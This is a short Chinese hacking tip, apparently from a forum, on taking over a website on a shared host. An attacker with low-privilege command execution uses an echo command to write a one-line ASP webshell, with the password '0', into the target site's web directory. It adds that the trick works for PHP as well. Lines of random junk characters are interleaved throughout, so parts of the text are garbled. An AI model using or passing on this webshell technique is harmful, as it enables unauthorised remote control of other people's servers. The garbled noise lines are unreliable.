在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
5 Y+ \ r l+ h% K& p6 [
( O3 t- f; E' v: K# |1 Y命令格式* L; i+ U0 ~1 f( O% u- o+ s% A
0 Z5 {( r0 ~4 S& k( sEcho 语句 >目标站绝对目录. O: r u6 D( x( A( M; `
; c f, V! W3 ?/ R# Q
例如: : t' l5 B, B8 V. f m( I$ D
4 m5 d4 ?! h8 v9 f) N
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
8 X- J& E3 w; o$ U' R9 h A% A% i! N3 d7 s( y
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
" Z7 Z6 X; `$ m3 a4 y |